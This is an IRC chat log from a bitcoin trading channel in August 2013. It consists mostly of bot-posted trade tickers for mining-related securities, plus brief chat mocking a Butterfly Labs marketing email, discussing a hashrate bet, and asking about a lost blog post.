network is provided by Butterfly Labs equipment. There are other, smaller ASIC bitcoin mining device manufacturers entering the market with products as well, but the difficulty will continue to rise in proportion to the shipping of our 65nm miners." Aug 30 01:48:04 [BTCTC] [LABCOIN] 1 @ 0.003688 BTC [+] Aug 30 01:48:16 "I'm not sure I'm interested. Should I be? Aug 30 01:48:16 This is a question of mining strategy and is a personal decision. As a hardware manufacturer, BFL only guarantees the performance of our products, not the market conditions of their use. This makes it hard to give advice on mining strategy." Aug 30 01:48:19 [BTCTC] [LABCOIN] 2 @ 0.003688 = 0.0074 BTC [+] Aug 30 01:48:31 i miss reptillia Aug 30 01:48:58 get ready for it Aug 30 01:49:00 "The counter argument is that the Monarch is still in development and won't start shipping until December. The 65nm products shipping now have a good ROI as of this writing. Market conditions are changing of course, but an increasing BTC price extends the life of all mining hardware. There is great value in taking delivery of your 65nm now." Aug 30 01:49:01 As we continue to ship more product, the majority of the hashrate on the network is provided by Butterfly Labs equipment. <<< lol. Aug 30 01:49:07 is it all in the securesauna room ? Aug 30 01:49:09 [BTCTC] [ACTIVEMINING] 140 @ 0.0043 = 0.602 BTC [-] Aug 30 01:49:40 "an increasing BTC price extends the life of all mining hardware. " Aug 30 01:50:02 got the BFL mail too, but I don't remember ever giving it to them Aug 30 01:50:04 "other, smaller venues which deliver actual mining units which you are invited to consider as peripheral to our five boxes of fans" Aug 30 01:50:21 and the mail they used is… odd Aug 30 01:50:52 maybe you signed up to their forums Aug 30 01:51:03 no and certainly with my real name mail Aug 30 01:51:06 +not Aug 30 01:51:25 maybe they buy lists from gox or such Aug 30 01:51:37 [BTCTC] [ACTIVEMINING] 2698 @ 0.004385 = 11.8307 BTC [+] Aug 30 01:51:38 [BTCTC] [ACTIVEMINING] 1777 @ 0.004386 = 7.7939 BTC [+] Aug 30 01:51:39 [BTCTC] [ACTIVEMINING] 50 @ 0.004392 = 0.2196 BTC [+] Aug 30 01:51:40 [BTCTC] [ACTIVEMINING] 61 @ 0.004699 = 0.2866 BTC [+] Aug 30 01:51:41 [BTCTC] [ACTIVEMINING] 500 @ 0.004792 = 2.396 BTC [+] Aug 30 01:51:42 [BTCTC] [ACTIVEMINING] 190 @ 0.004849 = 0.9213 BTC [+] Aug 30 01:51:43 [BTCTC] [ACTIVEMINING] 470 @ 0.00485 = 2.2795 BTC [+] Aug 30 01:51:44 [BTCTC] [ACTIVEMINING] 9 @ 0.004899 = 0.0441 BTC [+] Aug 30 01:51:45 [BTCTC] [ACTIVEMINING] 12 @ 0.0049 = 0.0588 BTC [+] Aug 30 01:51:46 [BTCTC] [ACTIVEMINING] 600 @ 0.0049 = 2.94 BTC [+] Aug 30 01:51:47 [BTCTC] [ACTIVEMINING] 20 @ 0.0049 = 0.098 BTC [+] Aug 30 01:51:48 [BTCTC] [ACTIVEMINING] 350 @ 0.004991 = 1.7469 BTC [+] Aug 30 01:51:48 it may be possible. mtgox's accounts were hacked and I started getting a lot of bitcoin scams by mail on that mail Aug 30 01:51:49 [BTCTC] [ACTIVEMINING] 185 @ 0.004998 = 0.9246 BTC [+] Aug 30 01:51:50 [BTCTC] [ACTIVEMINING] 750 @ 0.004998 = 3.7485 BTC [+] Aug 30 01:51:51 [BTCTC] [ACTIVEMINING] 43 @ 0.004999 = 0.215 BTC [+] Aug 30 01:51:51 [BTCTC] [ACTIVEMINING] 489 @ 0.004999 = 2.4445 BTC [+] Aug 30 01:51:52 [BTCTC] [ACTIVEMINING] 1000 @ 0.005 = 5 BTC [+] Aug 30 01:51:53 [BTCTC] [ACTIVEMINING] 1 @ 0.005 BTC [+] Aug 30 01:52:05 well... it's to be expected, scam slowly moves towards the bottoms of spamvertising Aug 30 01:52:16 blf, pills, knockoff shit... Aug 30 01:55:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000803 BTC [-] Aug 30 02:03:13 [BTCTC] [TAT.ASICMINER] 49 @ 0.02656 = 1.3014 BTC [+] Aug 30 02:03:40 [BTCTC] [TAT.ASICMINER] 30 @ 0.02656 = 0.7968 BTC [+] Aug 30 02:04:42 [BTCTC] [ACTIVEMINING] 749 @ 0.004504 = 3.3735 BTC [-] Aug 30 02:04:44 [BTCTC] [ACTIVEMINING] 2493 @ 0.004503 = 11.226 BTC [-] Aug 30 02:04:45 [BTCTC] [ACTIVEMINING] 505 @ 0.0045 = 2.2725 BTC [-] Aug 30 02:08:16 [HAVELOCK] [XBOND] 38 @ 0.00111191 = 0.0423 BTC [-] Aug 30 02:08:18 [HAVELOCK] [XBOND] 1 @ 0.0011119 BTC [-] Aug 30 02:08:20 [HAVELOCK] [XBOND] 151 @ 0.00111189 = 0.1679 BTC [-] Aug 30 02:08:22 [HAVELOCK] [XBOND] 5 @ 0.001111 = 0.0056 BTC [-] Aug 30 02:08:24 [HAVELOCK] [XBOND] 4 @ 0.00111 = 0.0044 BTC [-] Aug 30 02:08:26 [HAVELOCK] [XBOND] 1 @ 0.001108 BTC [-] Aug 30 02:08:28 [HAVELOCK] [XBOND] 10 @ 0.0011 = 0.011 BTC [-] Aug 30 02:10:23 [HAVELOCK] [XBOND] 2 @ 0.0010919 = 0.0022 BTC [-] Aug 30 02:10:26 [HAVELOCK] [XBOND] 2458 @ 0.00109002 = 2.6793 BTC [-] Aug 30 02:10:28 [HAVELOCK] [XBOND] 380 @ 0.00109001 = 0.4142 BTC [-] Aug 30 02:10:30 [HAVELOCK] [XBOND] 100 @ 0.00109 = 0.109 BTC [-] Aug 30 02:10:32 [HAVELOCK] [XBOND] 100 @ 0.00109 = 0.109 BTC [-] Aug 30 02:10:33 [HAVELOCK] [XBOND] 772 @ 0.00108 = 0.8338 BTC [-] Aug 30 02:10:35 [HAVELOCK] [XBOND] 1000 @ 0.001077 = 1.077 BTC [-] Aug 30 02:10:37 [HAVELOCK] [XBOND] 13 @ 0.00106007 = 0.0138 BTC [-] Aug 30 02:10:39 [HAVELOCK] [XBOND] 123 @ 0.00106006 = 0.1304 BTC [-] Aug 30 02:12:02 lol friedcat http://i.imgur.com/KxEuXnt.jpg Aug 30 02:12:02 :DDD Aug 30 02:12:56 [BTCTC] [ASICMINER-PT] 1 @ 2.799 BTC [-] Aug 30 02:13:29 lol Aug 30 02:14:00 [BTCTC] [BTC-TRADING-PT] 1 @ 0.9807 BTC [-] Aug 30 02:14:01 [BTCTC] [BTC-TRADING-PT] 9 @ 0.9805 = 8.8245 BTC [-] Aug 30 02:19:49 [BTCTC] [TAT.ASICMINER] 99 @ 0.0269 = 2.6631 BTC [+] Aug 30 02:20:27 [BTCTC] [TAT.ASICMINER] 61 @ 0.02698 = 1.6458 BTC [+] Aug 30 02:21:07 [BTCTC] [PETA-MINE] 1 @ 0.6499 BTC [-] Aug 30 02:21:35 [BTCTC] [ASICMINER-PT] 1 @ 2.76 BTC [-] Aug 30 02:21:53 [BTCTC] [TAT.ASICMINER] 190 @ 0.02699 = 5.1281 BTC [+] Aug 30 02:29:37 [HAVELOCK] [AM1] 1 @ 2.64999999 BTC [+] Aug 30 02:32:35 [HAVELOCK] [AM1] 1 @ 2.521 BTC [-] Aug 30 02:32:50 [HAVELOCK] [AM1] 1 @ 2.52 BTC [-] Aug 30 02:32:55 [BTCTC] [LABCOIN] 20 @ 0.003688 = 0.0738 BTC [+] Aug 30 02:36:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.0268 = 0.0804 BTC [-] Aug 30 02:37:14 [BTCTC] [LABCOIN] 3 @ 0.003689 = 0.0111 BTC [+] Aug 30 02:37:18 [MPEX] [S.MPOE] 2900 @ 0.00087225 = 2.5295 BTC [-] Aug 30 02:38:10 [BTCTC] [LABCOIN] 398 @ 0.003696 = 1.471 BTC [+] Aug 30 02:39:42 [HAVELOCK] [XBOND] 3500 @ 0.0011 = 3.85 BTC [+] Aug 30 02:39:48 [BTCTC] [LABCOIN] 1 @ 0.003696 BTC [+] Aug 30 02:40:13 [BTCTC] [LABCOIN] 75 @ 0.003696 = 0.2772 BTC [+] Aug 30 02:42:26 [BTCTC] [LABCOIN] 1 @ 0.003696 BTC [+] Aug 30 02:45:02 http://bitbet.us/bet/496/btc-network-hashrate-will-exceed-1-000-th-s-before/ Aug 30 02:45:06 BitBet - BTC network hashrate will exceed 1,000 TH/s before December 14th 2013 Aug 30 02:45:07 [BTCTC] [LABCOIN] 200 @ 0.003693 = 0.7386 BTC [-] Aug 30 02:45:07 10:1 on yes. Aug 30 02:45:18 what the fuck already. can it grow 15x in a season !? Aug 30 02:45:22 [BTCTC] [PETA-MINE] 3 @ 0.6499 = 1.9497 BTC [-] Aug 30 02:46:37 [BTCTC] [LTC-ATF.B2] 41 @ 0.01031 = 0.4227 BTC [-] Aug 30 02:47:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.0268 BTC [-] Aug 30 02:47:04 ;;hashrate Aug 30 02:47:05 Error: "hashrate" is not a valid command. Aug 30 02:47:09 ;;hash Aug 30 02:47:10 Error: "hash" is not a valid command. Aug 30 02:47:16 ;;nethash Aug 30 02:47:17 617828.880395 Aug 30 02:47:56 [HAVELOCK] [XBOND] 2 @ 0.00106006 = 0.0021 BTC [-] Aug 30 02:48:10 [HAVELOCK] [XBOND] 3 @ 0.00106006 = 0.0032 BTC [-] Aug 30 02:48:27 [HAVELOCK] [XBOND] 10 @ 0.00106001 = 0.0106 BTC [-] Aug 30 02:48:43 [HAVELOCK] [XBOND] 3 @ 0.00105001 = 0.0032 BTC [-] Aug 30 02:49:06 [HAVELOCK] [XBOND] 350 @ 0.00105 = 0.3675 BTC [-] Aug 30 02:49:22 [HAVELOCK] [XBOND] 10 @ 0.00105 = 0.0105 BTC [-] Aug 30 02:50:11 [BTCTC] [LABCOIN] 100 @ 0.003688 = 0.3688 BTC [-] Aug 30 02:51:18 [BTCTC] [ASICMINER-PT] 1 @ 2.716 BTC [-] Aug 30 02:51:46 [BTCTC] [BASIC-MINING] 3 @ 0.1823 = 0.5469 BTC [-] Aug 30 02:52:07 [BTCTC] [ASICMINER-PT] 2 @ 2.711 = 5.422 BTC [-] Aug 30 02:52:22 [BTCTC] [PETA-MINE] 1 @ 0.6499 BTC [-] Aug 30 03:00:34 [HAVELOCK] [XBOND] 28 @ 0.0011 = 0.0308 BTC [+] Aug 30 03:00:41 [BTCTC] [ASICMINER-PT] 1 @ 2.709 BTC [-] Aug 30 03:02:20 [HAVELOCK] [AM100] 1 @ 0.02589 BTC [+] Aug 30 03:04:32 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.0008685 = 0.0052 BTC [+] Aug 30 03:09:16 [BTCTC] [PAJKA.BOND] 3 @ 0.0131 = 0.0393 BTC [-] Aug 30 03:10:20 [BTCTC] [PAJKA.BOND] 8 @ 0.01284 = 0.1027 BTC [-] Aug 30 03:11:00 [BTCTC] [PAJKA.BOND] 106 @ 0.01251 = 1.3261 BTC [-] Aug 30 03:12:07 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [+] Aug 30 03:12:27 [BTCTC] [DMS.PURCHASE] 91 @ 0.01594 = 1.4505 BTC [-] Aug 30 03:15:11 [BTCTC] [LABCOIN] 2 @ 0.003698 = 0.0074 BTC [+] Aug 30 03:17:26 [BTCTC] [DMS.MINING] 1 @ 0.0034 BTC [+] Aug 30 03:18:18 [BTCTC] [DMS.MINING] 6 @ 0.003352 = 0.0201 BTC [-] Aug 30 03:19:11 [BTCTC] [DMS.MINING] 95 @ 0.003351 = 0.3183 BTC [-] Aug 30 03:19:57 [BTCTC] [DMS.MINING] 941 @ 0.00335 = 3.1524 BTC [-] Aug 30 03:22:07 [BTCTC] [DMS.PURCHASE] 217 @ 0.01594 = 3.459 BTC [-] Aug 30 03:22:39 [BTCTC] [DMS.PURCHASE] 1 @ 0.01594 BTC [-] Aug 30 03:23:03 [BTCTC] [LABCOIN] 10 @ 0.003698 = 0.037 BTC [+] Aug 30 03:23:16 [BTCTC] [TAT.ASICMINER] 20 @ 0.02582 = 0.5164 BTC [-] Aug 30 03:24:55 [HAVELOCK] [XBOND] 72 @ 0.0011 = 0.0792 BTC [+] Aug 30 03:25:13 [BTCTC] [PETA-MINE] 5 @ 0.6121 = 3.0605 BTC [-] Aug 30 03:25:29 [BTCTC] [LABCOIN] 247 @ 0.003698 = 0.9134 BTC [+] Aug 30 03:25:31 [BTCTC] [TAT.ASICMINER] 17 @ 0.02583 = 0.4391 BTC [+] Aug 30 03:25:31 [BTCTC] [DMS.MINING] 1 @ 0.003333 BTC [-] Aug 30 03:25:32 [BTCTC] [LABCOIN] 500 @ 0.003698 = 1.849 BTC [+] Aug 30 03:25:33 [BTCTC] [LABCOIN] 253 @ 0.0037 = 0.9361 BTC [+] Aug 30 03:25:34 [BTCTC] [TAT.ASICMINER] 30 @ 0.02582 = 0.7746 BTC [-] Aug 30 03:25:35 [BTCTC] [DMS.MINING] 200 @ 0.003332 = 0.6664 BTC [-] Aug 30 03:25:36 [BTCTC] [TAT.ASICMINER] 6 @ 0.0258 = 0.1548 BTC [-] Aug 30 03:26:02 [BTCTC] [DMS.MINING] 5 @ 0.00333 = 0.0167 BTC [-] Aug 30 03:26:04 [BTCTC] [DMS.MINING] 275 @ 0.00333 = 0.9158 BTC [-] Aug 30 03:26:20 [BTCTC] [ACTIVEMINING] 13 @ 0.0046 = 0.0598 BTC [+] Aug 30 03:26:35 [BTCTC] [ASICMINER-PT] 1 @ 2.78 BTC [+] Aug 30 03:26:52 [BTCTC] [DMS.MINING] 2 @ 0.003329 = 0.0067 BTC [-] Aug 30 03:26:54 [BTCTC] [DMS.MINING] 80 @ 0.003328 = 0.2662 BTC [-] Aug 30 03:26:55 [BTCTC] [DMS.MINING] 450 @ 0.003291 = 1.481 BTC [-] Aug 30 03:26:56 [BTCTC] [DMS.MINING] 43 @ 0.003291 = 0.1415 BTC [-] Aug 30 03:28:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.02669 = 0.2669 BTC [+] Aug 30 03:29:35 [BTCTC] [ACTIVEMINING] 8 @ 0.0046 = 0.0368 BTC [+] Aug 30 03:30:24 [BTCTC] [LABCOIN] 71 @ 0.003698 = 0.2626 BTC [-] Aug 30 03:31:36 [BTCTC] [DMS.PURCHASE] 218 @ 0.01594 = 3.4749 BTC [-] Aug 30 03:33:14 [BTCTC] [KENILWORTH] 1 @ 0.001798 BTC [-] Aug 30 03:34:09 [MPEX] [S.MPOE] 357 @ 0.00087501 = 0.3124 BTC [+] Aug 30 03:34:11 [MPEX] [S.MPOE] 10643 @ 0.00087637 = 9.3272 BTC [+] Aug 30 03:34:42 [BTCTC] [LABCOIN] 20 @ 0.003601 = 0.072 BTC [-] Aug 30 03:34:44 [BTCTC] [LABCOIN] 467 @ 0.00359 = 1.6765 BTC [-] Aug 30 03:34:45 [BTCTC] [LABCOIN] 75 @ 0.003588 = 0.2691 BTC [-] Aug 30 03:34:46 [BTCTC] [LABCOIN] 238 @ 0.003584 = 0.853 BTC [-] Aug 30 03:35:26 [BTCTC] [ASICMINER-PT] 1 @ 2.78 BTC [+] Aug 30 03:36:39 [BTCTC] [LABCOIN] 409 @ 0.00359 = 1.4683 BTC [+] Aug 30 03:36:53 [BTCTC] [LABCOIN] 2 @ 0.003694 = 0.0074 BTC [+] Aug 30 03:37:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.02669 = 0.0801 BTC [+] Aug 30 03:39:05 [BTCTC] [ESECURITYSABTC] 1 @ 0.2299 BTC [-] Aug 30 03:39:50 [MPEX] [S.MPOE] 10400 @ 0.00087251 = 9.0741 BTC [-] Aug 30 03:40:59 [BTCTC] [LABCOIN] 349 @ 0.00359 = 1.2529 BTC [-] Aug 30 03:41:01 [BTCTC] [LABCOIN] 20 @ 0.003587 = 0.0717 BTC [-] Aug 30 03:41:02 [BTCTC] [LABCOIN] 100 @ 0.003587 = 0.3587 BTC [-] Aug 30 03:41:03 [BTCTC] [LABCOIN] 231 @ 0.003583 = 0.8277 BTC [-] Aug 30 03:41:27 [BTCTC] [ACTIVEMINING] 175 @ 0.004598 = 0.8047 BTC [-] Aug 30 03:41:28 [BTCTC] [ACTIVEMINING] 50 @ 0.004599 = 0.23 BTC [+] Aug 30 03:41:30 [BTCTC] [ACTIVEMINING] 300 @ 0.004601 = 1.3803 BTC [+] Aug 30 03:45:54 [BTCTC] [BASIC-MINING] 1 @ 0.1872 BTC [+] Aug 30 03:47:45 [BTCTC] [BASIC-MINING] 1 @ 0.1872 BTC [+] Aug 30 03:50:27 [HAVELOCK] [XBOND] 1513 @ 0.0011 = 1.6643 BTC [+] Aug 30 03:53:43 [BTCTC] [LABCOIN] 54 @ 0.003669 = 0.1981 BTC [+] Aug 30 03:55:51 [BTCTC] [ASICMINER-PT] 1 @ 2.725 BTC [-] Aug 30 03:56:38 [BTCTC] [TAT.ASICMINER] 9 @ 0.02591 = 0.2332 BTC [-] Aug 30 03:58:06 [BTCTC] [ASICMINER-PT] 1 @ 2.684 BTC [-] Aug 30 03:58:22 [BTCTC] [RSM] 1 @ 0.0147 BTC [-] Aug 30 04:00:18 [BTCTC] [LABCOIN] 238 @ 0.003675 = 0.8747 BTC [+] Aug 30 04:00:19 [BTCTC] [LABCOIN] 410 @ 0.003676 = 1.5072 BTC [+] Aug 30 04:00:20 [BTCTC] [LABCOIN] 20 @ 0.003678 = 0.0736 BTC [+] Aug 30 04:09:17 [BTCTC] [ACTIVEMINING] 79 @ 0.004797 = 0.379 BTC [+] Aug 30 04:09:18 [BTCTC] [ACTIVEMINING] 46 @ 0.004798 = 0.2207 BTC [+] Aug 30 04:09:19 [BTCTC] [ACTIVEMINING] 73 @ 0.0048 = 0.3504 BTC [+] Aug 30 04:09:21 [BTCTC] [ACTIVEMINING] 336 @ 0.004828 = 1.6222 BTC [+] Aug 30 04:09:22 [BTCTC] [ACTIVEMINING] 505 @ 0.004829 = 2.4386 BTC [+] Aug 30 04:09:23 [BTCTC] [ACTIVEMINING] 2493 @ 0.004945 = 12.3279 BTC [+] Aug 30 04:09:24 [BTCTC] [ACTIVEMINING] 138 @ 0.004946 = 0.6825 BTC [+] Aug 30 04:09:24 [BTCTC] [ACTIVEMINING] 140 @ 0.00495 = 0.693 BTC [+] Aug 30 04:09:25 [BTCTC] [ACTIVEMINING] 2050 @ 0.004965 = 10.1783 BTC [+] Aug 30 04:09:26 [BTCTC] [ACTIVEMINING] 250 @ 0.004998 = 1.2495 BTC [+] Aug 30 04:13:57 [BTCTC] [ACTIVEMINING] 565 @ 0.005034 = 2.8442 BTC [+] Aug 30 04:15:56 [MPEX] [S.MPOE] 3850 @ 0.00087251 = 3.3592 BTC [-] Aug 30 04:15:58 [MPEX] [S.MPOE] 4400 @ 0.00087114 = 3.833 BTC [-] Aug 30 04:18:35 [HAVELOCK] [XBOND] 4676 @ 0.0011 = 5.1436 BTC [+] Aug 30 04:18:38 [HAVELOCK] [XBOND] 10 @ 0.0011 = 0.011 BTC [+] Aug 30 04:20:37 [BTCTC] [DMS.MINING] 1 @ 0.0033 BTC [+] Aug 30 04:20:39 [BTCTC] [DMS.MINING] 6 @ 0.003257 = 0.0195 BTC [-] Aug 30 04:20:39 [BTCTC] [DMS.MINING] 486 @ 0.003256 = 1.5824 BTC [-] Aug 30 04:20:40 [BTCTC] [DMS.MINING] 500 @ 0.003255 = 1.6275 BTC [-] Aug 30 04:20:41 [BTCTC] [DMS.MINING] 1 @ 0.00325 BTC [-] Aug 30 04:20:43 [BTCTC] [DMS.MINING] 175 @ 0.00325 = 0.5688 BTC [-] Aug 30 04:20:44 [BTCTC] [DMS.MINING] 200 @ 0.0032 = 0.64 BTC [-] Aug 30 04:20:45 [BTCTC] [DMS.MINING] 1 @ 0.0032 BTC [-] Aug 30 04:20:46 [BTCTC] [DMS.MINING] 1 @ 0.0032 BTC [-] Aug 30 04:20:47 [BTCTC] [DMS.MINING] 140 @ 0.00317 = 0.4438 BTC [-] Aug 30 04:20:48 [BTCTC] [DMS.MINING] 767 @ 0.00315 = 2.4161 BTC [-] Aug 30 04:26:16 [BTCTC] [ACTIVEMINING] 250 @ 0.004601 = 1.1503 BTC [-] Aug 30 04:26:42 [BTCTC] [LABCOIN] 10 @ 0.003611 = 0.0361 BTC [-] Aug 30 04:26:43 [BTCTC] [LABCOIN] 366 @ 0.003609 = 1.3209 BTC [-] Aug 30 04:26:44 [BTCTC] [LABCOIN] 675 @ 0.003609 = 2.4361 BTC [-] Aug 30 04:26:45 [BTCTC] [LABCOIN] 400 @ 0.003602 = 1.4408 BTC [-] Aug 30 04:26:46 [BTCTC] [LABCOIN] 20 @ 0.003586 = 0.0717 BTC [-] Aug 30 04:26:48 [BTCTC] [LABCOIN] 329 @ 0.003583 = 1.1788 BTC [-] Aug 30 04:29:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.02663 BTC [+] Aug 30 04:35:39 [BTCTC] [ACTIVEMINING] 1000 @ 0.004488 = 4.488 BTC [-] Aug 30 04:36:12 [BTCTC] [LABCOIN] 10 @ 0.00365 = 0.0365 BTC [+] Aug 30 04:37:33 [BTCTC] [DMS.MINING] 733 @ 0.00315 = 2.309 BTC [-] Aug 30 04:37:35 [BTCTC] [DMS.MINING] 467 @ 0.00312 = 1.457 BTC [-] Aug 30 04:38:15 [BTCTC] [LABCOIN] 292 @ 0.003692 = 1.0781 BTC [+] Aug 30 04:39:07 [BTCTC] [ASICMINER-PT] 1 @ 2.739 BTC [+] Aug 30 04:40:09 [BTCTC] [KENILWORTH] 9 @ 0.001798 = 0.0162 BTC [-] Aug 30 04:40:22 [BTCTC] [LABCOIN] 1 @ 0.003605 BTC [-] Aug 30 04:40:33 [MPEX] [S.MPOE] 2721 @ 0.00087637 = 2.3846 BTC [+] Aug 30 04:40:35 [MPEX] [S.MPOE] 229 @ 0.00087689 = 0.2008 BTC [+] Aug 30 04:42:25 [BTCTC] [KENILWORTH] 112 @ 0.001799 = 0.2015 BTC [+] Aug 30 04:43:24 [BTCTC] [LABCOIN] 44 @ 0.003692 = 0.1624 BTC [+] Aug 30 04:43:41 [BTCTC] [LABCOIN] 56 @ 0.003692 = 0.2068 BTC [+] Aug 30 04:45:38 [BTCTC] [DMS.SELLING] 72 @ 0.01254 = 0.9029 BTC [+] Aug 30 04:46:37 [BTCTC] [KENILWORTH] 33 @ 0.001799 = 0.0594 BTC [+] Aug 30 04:48:18 [HAVELOCK] [AM100] 9 @ 0.02589 = 0.233 BTC [+] Aug 30 04:49:10 [MPEX] [S.MPOE] 3619 @ 0.00087114 = 3.1527 BTC [-] Aug 30 04:49:12 [MPEX] [S.MPOE] 6607 @ 0.00087095 = 5.7544 BTC [-] Aug 30 04:49:29 [BTCTC] [LABCOIN] 1 @ 0.003692 BTC [+] Aug 30 04:49:32 [BTCTC] [DMS.MINING] 30 @ 0.00313 = 0.0939 BTC [+] Aug 30 04:50:27 [HAVELOCK] [AM100] 90 @ 0.0259 = 2.331 BTC [+] Aug 30 04:50:43 [HAVELOCK] [AM100] 1 @ 0.0259 BTC [+] Aug 30 04:51:54 [BTCTC] [DMS.MINING] 5 @ 0.00339 = 0.017 BTC [+] Aug 30 04:56:15 [BTCTC] [ACTIVEMINING] 1000 @ 0.004517 = 4.517 BTC [+] Aug 30 04:57:47 [BTCTC] [LABCOIN] 341 @ 0.003692 = 1.259 BTC [+] Aug 30 04:58:02 [BTCTC] [LABCOIN] 200 @ 0.003692 = 0.7384 BTC [+] Aug 30 04:58:14 [BTCTC] [LABCOIN] 200 @ 0.003692 = 0.7384 BTC [+] Aug 30 04:58:23 [BTCTC] [LABCOIN] 117 @ 0.003692 = 0.432 BTC [+] Aug 30 04:58:35 [BTCTC] [LABCOIN] 117 @ 0.003692 = 0.432 BTC [+] Aug 30 05:00:13 [BTCTC] [LABCOIN] 224 @ 0.003692 = 0.827 BTC [+] Aug 30 05:02:45 [BTCTC] [KENILWORTH] 10 @ 0.001798 = 0.018 BTC [-] Aug 30 05:03:21 [BTCTC] [KENILWORTH] 27 @ 0.001799 = 0.0486 BTC [+] Aug 30 05:03:32 [BTCTC] [TAT.ASICMINER] 12 @ 0.02662 = 0.3194 BTC [-] Aug 30 05:04:22 [BTCTC] [TAT.ASICMINER] 22 @ 0.02663 = 0.5859 BTC [+] Aug 30 05:06:51 [BTCTC] [LABCOIN] 116 @ 0.003692 = 0.4283 BTC [+] Aug 30 05:06:53 [BTCTC] [LABCOIN] 75 @ 0.003694 = 0.2771 BTC [+] Aug 30 05:06:54 [BTCTC] [LABCOIN] 109 @ 0.003697 = 0.403 BTC [+] Aug 30 05:11:46 [BTCTC] [ACTIVEMINING] 500 @ 0.005018 = 2.509 BTC [+] Aug 30 05:15:29 [MPEX] [S.MPOE] 2544 @ 0.00086919 = 2.2112 BTC [-] Aug 30 05:15:30 [MPEX] [S.MPOE] 7256 @ 0.00086919 = 6.3068 BTC [-] Aug 30 05:15:31 [MPEX] [S.MPOE] 2544 @ 0.00086919 = 2.2112 BTC [-] Aug 30 05:15:32 [MPEX] [S.MPOE] 13244 @ 0.00086917 = 11.5113 BTC [-] Aug 30 05:21:31 [BTCTC] [RSM] 26 @ 0.0146 = 0.3796 BTC [-] Aug 30 05:22:09 [BTCTC] [BASIC-MINING] 1 @ 0.1873 BTC [+] Aug 30 05:22:19 ok so trilema is back. Aug 30 05:22:34 it seems the latest article (ie euloria update) didn't make it into the daily backups. Aug 30 05:22:41 or into google cache for that matter. Aug 30 05:22:43 [BTCTC] [RSM] 24 @ 0.0146 = 0.3504 BTC [-] Aug 30 05:22:49 if anyone has a copy i'd muchly appreciate it, thanks. Aug 30 05:22:57 [BTCTC] [BASIC-MINING] 1 @ 0.1875 BTC [+] Aug 30 05:22:58 [BTCTC] [BASIC-MINING] 1 @ 0.1995 BTC [+] Aug 30 05:24:21 [BTCTC] [PETA-MINE] 2 @ 0.6122 = 1.2244 BTC [+] Aug 30 05:25:22 [BTCTC] [LABCOIN] 20 @ 0.003694 = 0.0739 BTC [-] Aug 30 05:27:26 [BTCTC] [LABCOIN] 96 @ 0.003695 = 0.3547 BTC [+] Aug 30 05:28:23 [BTCTC] [LABCOIN] 96 @ 0.003695 = 0.3547 BTC [+] Aug 30 05:28:38 [BTCTC] [LABCOIN] 84 @ 0.003697 = 0.3105 BTC [+] Aug 30 05:29:32 [BTCTC] [KENILWORTH] 3 @ 0.001798 = 0.0054 BTC [-] Aug 30 05:30:18 [BTCTC] [BASIC-MINING] 1 @ 0.1996 BTC [+] Aug 30 05:30:26 [BTCTC] [KENILWORTH] 47 @ 0.001799 = 0.0846 BTC [+] Aug 30 05:31:48 [BTCTC] [LABCOIN] 100 @ 0.003697 = 0.3697 BTC [+] Aug 30 05:32:39 [HAVELOCK] [AM100] 8 @ 0.0259 = 0.2072 BTC [+] Aug 30 05:33:00 [BTCTC] [LABCOIN] 100 @ 0.003697 = 0.3697 BTC [+] Aug 30 05:33:11 [BTCTC] [LABCOIN] 110 @ 0.003695 = 0.4065 BTC [-] Aug 30 05:39:29 [BTCTC] [ACTIVEMINING] 12 @ 0.004536 = 0.0544 BTC [-] Aug 30 05:39:53 [BTCTC] [ACTIVEMINING] 50 @ 0.004535 = 0.2268 BTC [-] Aug 30 05:40:09 [BTCTC] [TAT.ASICMINER] 50 @ 0.0266 = 1.33 BTC [-] Aug 30 05:41:00 [BTCTC] [ACTIVEMINING] 918 @ 0.004513 = 4.1429 BTC [-] Aug 30 05:42:49 [MPEX] [S.MPOE] 3356 @ 0.00086917 = 2.9169 BTC [-] Aug 30 05:42:51 [MPEX] [S.MPOE] 644 @ 0.00086826 = 0.5592 BTC [-] Aug 30 05:44:08 [BTCTC] [ACTIVEMINING] 248 @ 0.00451 = 1.1185 BTC [-] Aug 30 05:44:10 [BTCTC] [ACTIVEMINING] 990 @ 0.004509 = 4.4639 BTC [-] Aug 30 05:44:18 [BTCTC] [ACTIVEMINING] 487 @ 0.004509 = 2.1959 BTC [-] Aug 30 05:44:34 [BTCTC] [LABCOIN] 17 @ 0.003697 = 0.0628 BTC [+] Aug 30 05:44:42 [BTCTC] [LABCOIN] 69 @ 0.003695 = 0.255 BTC [-] Aug 30 05:45:34 [BTCTC] [BASIC-MINING] 4 @ 0.1998 = 0.7992 BTC [+] Aug 30 05:46:44 [BTCTC] [ACTIVEMINING] 3 @ 0.00499 = 0.015 BTC [+] Aug 30 05:49:16 [BTCTC] [LABCOIN] 590 @ 0.003697 = 2.1812 BTC [+] Aug 30 05:50:09 [BTCTC] [ACTIVEMINING] 1 @ 0.004986 BTC [-] Aug 30 05:55:54 [BTCTC] [LABCOIN] 1563 @ 0.0037 = 5.7831 BTC [+] Aug 30 05:56:37 [BTCTC] [LABCOIN] 2000 @ 0.003794 = 7.588 BTC [+] Aug 30 05:56:39 [BTCTC] [LABCOIN] 4000 @ 0.003795 = 15.18 BTC [+] Aug 30 05:56:39 [BTCTC] [LABCOIN] 848 @ 0.003798 = 3.2207 BTC [+] Aug 30 05:56:40 [BTCTC] [LABCOIN] 2000 @ 0.003798 = 7.596 BTC [+] Aug 30 05:56:41 [BTCTC] [LABCOIN] 231 @ 0.003798 = 0.8773 BTC [+] Aug 30 05:57:15 [BTCTC] [LABCOIN] 747 @ 0.0038 = 2.8386 BTC [+] Aug 30 05:57:48 [BTCTC] [DMS.MINING] 1 @ 0.003389 BTC [-] Aug 30 05:58:07 mircea_popescu , i might have a copy. i will look in the morning and see Aug 30 05:58:44 jborkl thanks! Aug 30 05:59:50 diamonds are forever Aug 30 06:00:19 .d Aug 30 06:00:19 65750060.14908 | Next Diff in 1071 blocks | Estimated Change: 18.4094% in 6d 1h 30m 21s Aug 30 06:00:39 thestringpuller hey, you read it did you ? check your cache! Aug 30 06:03:07 [BTCTC] [ACTIVEMINING] 12 @ 0.004514 = 0.0542 BTC [-] Aug 30 06:03:09 